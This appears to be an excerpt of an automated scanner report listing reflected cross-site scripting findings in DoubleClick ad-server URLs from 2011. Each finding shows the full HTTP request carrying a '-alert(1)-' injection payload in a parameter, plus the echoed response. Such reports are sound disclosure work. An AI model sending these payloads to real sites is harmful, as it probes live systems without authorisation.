6.37. http://ad.au.doubleclick.net/adj/N799.125935.3435369420621/B5110009 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.au.doubleclick.net
Path:   /adj/N799.125935.3435369420621/B5110009

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d1af9'-alert(1)-'24059d22b80 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N799.125935.3435369420621/B5110009;sz=300x125;dcopt=rcl;click0=http://wrapper.g.REDACTED.com/GRedirect.aspx?g.REDACTED.com/2AD00042/55000000000042726.1?!d1af9'-alert(1)-'24059d22b80&&PID=8197329&UIT=G&TargetID=10928385&AN=2017002340&PG=AUBEEN&ASID=97866bc3bc534483a55e34973920acb3&destination=;ord=2017002340? HTTP/1.1
Host: ad.au.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.nineREDACTED.com.au/national/8241327/migration-proposal-weak-abbott-says?alert=yes
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 02 May 2011 12:52:04 GMT
Content-Length: 6343

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\r\n<!-- Code auto-generated on Mon Apr 04 07:35:43 EDT 2011 -->\r\r\n<script src=\"http://s0.2mdn.
...[SNIP]...
<a target=\"_blank\" href=\"http://wrapper.g.REDACTED.com/GRedirect.aspx?g.REDACTED.com/2AD00042/55000000000042726.1?!d1af9'-alert(1)-'24059d22b80&&PID=8197329&UIT=G&TargetID=10928385&AN=2017002340&PG=AUBEEN&ASID=97866bc3bc534483a55e34973920acb3&destination=http://ad.au.doubleclick.net/6k%3Bh%3Dv8/3afb/17/dc/%2a/f%3B240447302%3B0-0%3B0%3B5776418
...[SNIP]...

6.38. http://ad.au.doubleclick.net/adj/N799.125935.3435369420621/B5110009 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.au.doubleclick.net
Path:   /adj/N799.125935.3435369420621/B5110009

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c9f0d"-alert(1)-"8875c28e870 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N799.125935.3435369420621/B5110009;sz=300x125;dcopt=rcl;click0=http://wrapper.g.REDACTED.com/GRedirect.aspx?g.REDACTED.com/2AD00042/55000000000042726.1?!c9f0d"-alert(1)-"8875c28e870&&PID=8197329&UIT=G&TargetID=10928385&AN=2017002340&PG=AUBEEN&ASID=97866bc3bc534483a55e34973920acb3&destination=;ord=2017002340? HTTP/1.1
Host: ad.au.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.nineREDACTED.com.au/national/8241327/migration-proposal-weak-abbott-says?alert=yes
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 02 May 2011 12:51:59 GMT
Content-Length: 6343

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\r\n<!-- Code auto-generated on Mon Apr 04 07:35:43 EDT 2011 -->\r\r\n<script src=\"http://s0.2mdn.
...[SNIP]...
et/376153/3-BMW_X3_300x125_14Mar2011.gif";
var minV = 9;
var FWH = ' width="300" height="125" ';
var url = escape("http://wrapper.g.REDACTED.com/GRedirect.aspx?g.REDACTED.com/2AD00042/55000000000042726.1?!c9f0d"-alert(1)-"8875c28e870&&PID=8197329&UIT=G&TargetID=10928385&AN=2017002340&PG=AUBEEN&ASID=97866bc3bc534483a55e34973920acb3&destination=http://ad.au.doubleclick.net/6k%3Bh%3Dv8/3afb/17/dc/%2a/f%3B240447302%3B0-0%3B0%3B5776418
...[SNIP]...

6.39. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.390 [campID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3941.InviteMedia/B5414127.390

Issue detail

The value of the campID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4e39a"-alert(1)-"8d72fc9941b was submitted in the campID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N3941.InviteMedia/B5414127.390;sz=300x250;pc=[TPAS_ID];click=http://ad.yieldmanager.com/clk?2,13%3Bf1f9c18805cba7f4%3B12fb0be2376,0%3B%3B%3B2888316814,smUAANBtDABR84oAAAAAAN8.IwAAAAAAAgAAAAIAAAAAAP8AAAACCP9yGAAAAAAAvl8ZAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAdiO-sC8BAAAAAAAAADE1OTYwZmYyLTc0YmEtMTFlMC1hYWUzLTAwMjM3ZDQzN2VmNQA4nyoAAAA=,,http%3A%2F%2Fwww.theage.com.au%2Fnational%2Fchristmas-island-action-adds-to-villawood-woes-20110425-1du6x.html,$http://t.invitemedia.com/track_click?auctionID=1304340341814544-110847&campID=803404e39a"-alert(1)-"8d72fc9941b&crID=110847&pubICode=1662910&pub=256078&partnerID=9&url=http%3A%2F%2Fwww%2Etheage%2Ecom%2Eau%2Fnational%2Fchristmas%2Disland%2Daction%2Dadds%2Dto%2Dvillawood%2Dwoes%2D20110425%2D1du6x%2Ehtml&redirectURL=;ord=1304340341? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?smUAANBtDABR84oAAAAAAN8.IwAAAAAAAgAAAAIAAAAAAP8AAAACCP9yGAAAAAAAvl8ZAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAuB6F61E4AUBmZmZmZmYUQEJCQkJCQhRAAAAAAAAAKEBCQkJCQkIUQAAAAAAAAChAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABcOWgN9IsHCvhK0lkUX7yuRwW0ceklLOf6oZ84AAAAAA==,,http%3A%2F%2Fwww.theage.com.au%2Fnational%2Fchristmas-island-action-adds-to-villawood-woes-20110425-1du6x.html,Z%3D300x250%26s%3D814544%26r%3D0%26_salt%3D2052082148%26u%3Dhttp%253A%252F%252Fwww.theage.com.au%252Fnational%252Fchristmas-island-action-adds-to-villawood-woes-20110425-1du6x.html,15960ff2-74ba-11e0-aae3-00237d437ef5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 02 May 2011 12:49:54 GMT
Content-Length: 9062

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
AAA=,,http%3A%2F%2Fwww.theage.com.au%2Fnational%2Fchristmas-island-action-adds-to-villawood-woes-20110425-1du6x.html,$http://t.invitemedia.com/track_click?auctionID=1304340341814544-110847&campID=803404e39a"-alert(1)-"8d72fc9941b&crID=110847&pubICode=1662910&pub=256078&partnerID=9&url=http%3A%2F%2Fwww%2Etheage%2Ecom%2Eau%2Fnational%2Fchristmas%2Disland%2Daction%2Dadds%2Dto%2Dvillawood%2Dwoes%2D20110425%2D1du6x%2Ehtml&redirectU
...[SNIP]...

6.40. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.390 [crID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3941.InviteMedia/B5414127.390

Issue detail

The value of the crID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3689a"-alert(1)-"6360c3aeebe was submitted in the crID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N3941.InviteMedia/B5414127.390;sz=300x250;pc=[TPAS_ID];click=http://ad.yieldmanager.com/clk?2,13%3Bf1f9c18805cba7f4%3B12fb0be2376,0%3B%3B%3B2888316814,smUAANBtDABR84oAAAAAAN8.IwAAAAAAAgAAAAIAAAAAAP8AAAACCP9yGAAAAAAAvl8ZAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAdiO-sC8BAAAAAAAAADE1OTYwZmYyLTc0YmEtMTFlMC1hYWUzLTAwMjM3ZDQzN2VmNQA4nyoAAAA=,,http%3A%2F%2Fwww.theage.com.au%2Fnational%2Fchristmas-island-action-adds-to-villawood-woes-20110425-1du6x.html,$http://t.invitemedia.com/track_click?auctionID=1304340341814544-110847&campID=80340&crID=1108473689a"-alert(1)-"6360c3aeebe&pubICode=1662910&pub=256078&partnerID=9&url=http%3A%2F%2Fwww%2Etheage%2Ecom%2Eau%2Fnational%2Fchristmas%2Disland%2Daction%2Dadds%2Dto%2Dvillawood%2Dwoes%2D20110425%2D1du6x%2Ehtml&redirectURL=;ord=1304340341? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?smUAANBtDABR84oAAAAAAN8.IwAAAAAAAgAAAAIAAAAAAP8AAAACCP9yGAAAAAAAvl8ZAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAuB6F61E4AUBmZmZmZmYUQEJCQkJCQhRAAAAAAAAAKEBCQkJCQkIUQAAAAAAAAChAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABcOWgN9IsHCvhK0lkUX7yuRwW0ceklLOf6oZ84AAAAAA==,,http%3A%2F%2Fwww.theage.com.au%2Fnational%2Fchristmas-island-action-adds-to-villawood-woes-20110425-1du6x.html,Z%3D300x250%26s%3D814544%26r%3D0%26_salt%3D2052082148%26u%3Dhttp%253A%252F%252Fwww.theage.com.au%252Fnational%252Fchristmas-island-action-adds-to-villawood-woes-20110425-1du6x.html,15960ff2-74ba-11e0-aae3-00237d437ef5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 02 May 2011 12:50:04 GMT
Content-Length: 9062

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
A%2F%2Fwww.theage.com.au%2Fnational%2Fchristmas-island-action-adds-to-villawood-woes-20110425-1du6x.html,$http://t.invitemedia.com/track_click?auctionID=1304340341814544-110847&campID=80340&crID=1108473689a"-alert(1)-"6360c3aeebe&pubICode=1662910&pub=256078&partnerID=9&url=http%3A%2F%2Fwww%2Etheage%2Ecom%2Eau%2Fnational%2Fchristmas%2Disland%2Daction%2Dadds%2Dto%2Dvillawood%2Dwoes%2D20110425%2D1du6x%2Ehtml&redirectURL=http%3a%2
...[SNIP]...

6.41. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.390 [partnerID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3941.InviteMedia/B5414127.390

Issue detail

The value of the partnerID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f4274"-alert(1)-"6749e576522 was submitted in the partnerID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N3941.InviteMedia/B5414127.390;sz=300x250;pc=[TPAS_ID];click=http://ad.yieldmanager.com/clk?2,13%3Bf1f9c18805cba7f4%3B12fb0be2376,0%3B%3B%3B2888316814,smUAANBtDABR84oAAAAAAN8.IwAAAAAAAgAAAAIAAAAAAP8AAAACCP9yGAAAAAAAvl8ZAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAdiO-sC8BAAAAAAAAADE1OTYwZmYyLTc0YmEtMTFlMC1hYWUzLTAwMjM3ZDQzN2VmNQA4nyoAAAA=,,http%3A%2F%2Fwww.theage.com.au%2Fnational%2Fchristmas-island-action-adds-to-villawood-woes-20110425-1du6x.html,$http://t.invitemedia.com/track_click?auctionID=1304340341814544-110847&campID=80340&crID=110847&pubICode=1662910&pub=256078&partnerID=9f4274"-alert(1)-"6749e576522&url=http%3A%2F%2Fwww%2Etheage%2Ecom%2Eau%2Fnational%2Fchristmas%2Disland%2Daction%2Dadds%2Dto%2Dvillawood%2Dwoes%2D20110425%2D1du6x%2Ehtml&redirectURL=;ord=1304340341? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?smUAANBtDABR84oAAAAAAN8.IwAAAAAAAgAAAAIAAAAAAP8AAAACCP9yGAAAAAAAvl8ZAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAuB6F61E4AUBmZmZmZmYUQEJCQkJCQhRAAAAAAAAAKEBCQkJCQkIUQAAAAAAAAChAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABcOWgN9IsHCvhK0lkUX7yuRwW0ceklLOf6oZ84AAAAAA==,,http%3A%2F%2Fwww.theage.com.au%2Fnational%2Fchristmas-island-action-adds-to-villawood-woes-20110425-1du6x.html,Z%3D300x250%26s%3D814544%26r%3D0%26_salt%3D2052082148%26u%3Dhttp%253A%252F%252Fwww.theage.com.au%252Fnational%252Fchristmas-island-action-adds-to-villawood-woes-20110425-1du6x.html,15960ff2-74ba-11e0-aae3-00237d437ef5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 02 May 2011 12:50:42 GMT
Content-Length: 9062

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
ristmas-island-action-adds-to-villawood-woes-20110425-1du6x.html,$http://t.invitemedia.com/track_click?auctionID=1304340341814544-110847&campID=80340&crID=110847&pubICode=1662910&pub=256078&partnerID=9f4274"-alert(1)-"6749e576522&url=http%3A%2F%2Fwww%2Etheage%2Ecom%2Eau%2Fnational%2Fchristmas%2Disland%2Daction%2Dadds%2Dto%2Dvillawood%2Dwoes%2D20110425%2D1du6x%2Ehtml&redirectURL=http%3a%2f%2fwww.tdameritrade.com/offer/250freetr
...[SNIP]...

6.42. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.390 [pub parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3941.InviteMedia/B5414127.390

Issue detail

The value of the pub request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8e70c"-alert(1)-"37993143f63 was submitted in the pub parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N3941.InviteMedia/B5414127.390;sz=300x250;pc=[TPAS_ID];click=http://ad.yieldmanager.com/clk?2,13%3Bf1f9c18805cba7f4%3B12fb0be2376,0%3B%3B%3B2888316814,smUAANBtDABR84oAAAAAAN8.IwAAAAAAAgAAAAIAAAAAAP8AAAACCP9yGAAAAAAAvl8ZAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAdiO-sC8BAAAAAAAAADE1OTYwZmYyLTc0YmEtMTFlMC1hYWUzLTAwMjM3ZDQzN2VmNQA4nyoAAAA=,,http%3A%2F%2Fwww.theage.com.au%2Fnational%2Fchristmas-island-action-adds-to-villawood-woes-20110425-1du6x.html,$http://t.invitemedia.com/track_click?auctionID=1304340341814544-110847&campID=80340&crID=110847&pubICode=1662910&pub=2560788e70c"-alert(1)-"37993143f63&partnerID=9&url=http%3A%2F%2Fwww%2Etheage%2Ecom%2Eau%2Fnational%2Fchristmas%2Disland%2Daction%2Dadds%2Dto%2Dvillawood%2Dwoes%2D20110425%2D1du6x%2Ehtml&redirectURL=;ord=1304340341? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?smUAANBtDABR84oAAAAAAN8.IwAAAAAAAgAAAAIAAAAAAP8AAAACCP9yGAAAAAAAvl8ZAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAuB6F61E4AUBmZmZmZmYUQEJCQkJCQhRAAAAAAAAAKEBCQkJCQkIUQAAAAAAAAChAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABcOWgN9IsHCvhK0lkUX7yuRwW0ceklLOf6oZ84AAAAAA==,,http%3A%2F%2Fwww.theage.com.au%2Fnational%2Fchristmas-island-action-adds-to-villawood-woes-20110425-1du6x.html,Z%3D300x250%26s%3D814544%26r%3D0%26_salt%3D2052082148%26u%3Dhttp%253A%252F%252Fwww.theage.com.au%252Fnational%252Fchristmas-island-action-adds-to-villawood-woes-20110425-1du6x.html,15960ff2-74ba-11e0-aae3-00237d437ef5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 02 May 2011 12:50:29 GMT
Content-Length: 9062

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
ational%2Fchristmas-island-action-adds-to-villawood-woes-20110425-1du6x.html,$http://t.invitemedia.com/track_click?auctionID=1304340341814544-110847&campID=80340&crID=110847&pubICode=1662910&pub=2560788e70c"-alert(1)-"37993143f63&partnerID=9&url=http%3A%2F%2Fwww%2Etheage%2Ecom%2Eau%2Fnational%2Fchristmas%2Disland%2Daction%2Dadds%2Dto%2Dvillawood%2Dwoes%2D20110425%2D1du6x%2Ehtml&redirectURL=http%3a%2f%2fwww.tdameritrade.com/off
...[SNIP]...

6.43. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.390 [pubICode parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3941.InviteMedia/B5414127.390

Issue detail

The value of the pubICode request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ca208"-alert(1)-"8a30c001f0e was submitted in the pubICode parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N3941.InviteMedia/B5414127.390;sz=300x250;pc=[TPAS_ID];click=http://ad.yieldmanager.com/clk?2,13%3Bf1f9c18805cba7f4%3B12fb0be2376,0%3B%3B%3B2888316814,smUAANBtDABR84oAAAAAAN8.IwAAAAAAAgAAAAIAAAAAAP8AAAACCP9yGAAAAAAAvl8ZAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAdiO-sC8BAAAAAAAAADE1OTYwZmYyLTc0YmEtMTFlMC1hYWUzLTAwMjM3ZDQzN2VmNQA4nyoAAAA=,,http%3A%2F%2Fwww.theage.com.au%2Fnational%2Fchristmas-island-action-adds-to-villawood-woes-20110425-1du6x.html,$http://t.invitemedia.com/track_click?auctionID=1304340341814544-110847&campID=80340&crID=110847&pubICode=1662910ca208"-alert(1)-"8a30c001f0e&pub=256078&partnerID=9&url=http%3A%2F%2Fwww%2Etheage%2Ecom%2Eau%2Fnational%2Fchristmas%2Disland%2Daction%2Dadds%2Dto%2Dvillawood%2Dwoes%2D20110425%2D1du6x%2Ehtml&redirectURL=;ord=1304340341? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?smUAANBtDABR84oAAAAAAN8.IwAAAAAAAgAAAAIAAAAAAP8AAAACCP9yGAAAAAAAvl8ZAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAuB6F61E4AUBmZmZmZmYUQEJCQkJCQhRAAAAAAAAAKEBCQkJCQkIUQAAAAAAAAChAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABcOWgN9IsHCvhK0lkUX7yuRwW0ceklLOf6oZ84AAAAAA==,,http%3A%2F%2Fwww.theage.com.au%2Fnational%2Fchristmas-island-action-adds-to-villawood-woes-20110425-1du6x.html,Z%3D300x250%26s%3D814544%26r%3D0%26_salt%3D2052082148%26u%3Dhttp%253A%252F%252Fwww.theage.com.au%252Fnational%252Fchristmas-island-action-adds-to-villawood-woes-20110425-1du6x.html,15960ff2-74ba-11e0-aae3-00237d437ef5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 02 May 2011 12:50:17 GMT
Content-Length: 9062

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
.com.au%2Fnational%2Fchristmas-island-action-adds-to-villawood-woes-20110425-1du6x.html,$http://t.invitemedia.com/track_click?auctionID=1304340341814544-110847&campID=80340&crID=110847&pubICode=1662910ca208"-alert(1)-"8a30c001f0e&pub=256078&partnerID=9&url=http%3A%2F%2Fwww%2Etheage%2Ecom%2Eau%2Fnational%2Fchristmas%2Disland%2Daction%2Dadds%2Dto%2Dvillawood%2Dwoes%2D20110425%2D1du6x%2Ehtml&redirectURL=http%3a%2f%2fwww.tdameritr
...[SNIP]...

6.44. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.390 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3941.InviteMedia/B5414127.390

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6a270"-alert(1)-"84104877d0e was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N3941.InviteMedia/B5414127.390;sz=300x250;pc=[TPAS_ID];click=http://ad.yieldmanager.com/clk?2,13%3Bf1f9c18805cba7f4%3B12fb0be2376,0%3B%3B%3B2888316814,smUAANBtDABR84oAAAAAAN8.IwAAAAAAAgAAAAIAAAAAAP8AAAACCP9yGAAAAAAAvl8ZAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAdiO-sC8BAAAAAAAAADE1OTYwZmYyLTc0YmEtMTFlMC1hYWUzLTAwMjM3ZDQzN2VmNQA4nyoAAAA=,,http%3A%2F%2Fwww.theage.com.au%2Fnational%2Fchristmas-island-action-adds-to-villawood-woes-20110425-1du6x.html,$http://t.invitemedia.com/track_click?auctionID=1304340341814544-1108476a270"-alert(1)-"84104877d0e&campID=80340&crID=110847&pubICode=1662910&pub=256078&partnerID=9&url=http%3A%2F%2Fwww%2Etheage%2Ecom%2Eau%2Fnational%2Fchristmas%2Disland%2Daction%2Dadds%2Dto%2Dvillawood%2Dwoes%2D20110425%2D1du6x%2Ehtml&redirectURL=;ord=1304340341? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?smUAANBtDABR84oAAAAAAN8.IwAAAAAAAgAAAAIAAAAAAP8AAAACCP9yGAAAAAAAvl8ZAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAuB6F61E4AUBmZmZmZmYUQEJCQkJCQhRAAAAAAAAAKEBCQkJCQkIUQAAAAAAAAChAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABcOWgN9IsHCvhK0lkUX7yuRwW0ceklLOf6oZ84AAAAAA==,,http%3A%2F%2Fwww.theage.com.au%2Fnational%2Fchristmas-island-action-adds-to-villawood-woes-20110425-1du6x.html,Z%3D300x250%26s%3D814544%26r%3D0%26_salt%3D2052082148%26u%3Dhttp%253A%252F%252Fwww.theage.com.au%252Fnational%252Fchristmas-island-action-adds-to-villawood-woes-20110425-1du6x.html,15960ff2-74ba-11e0-aae3-00237d437ef5
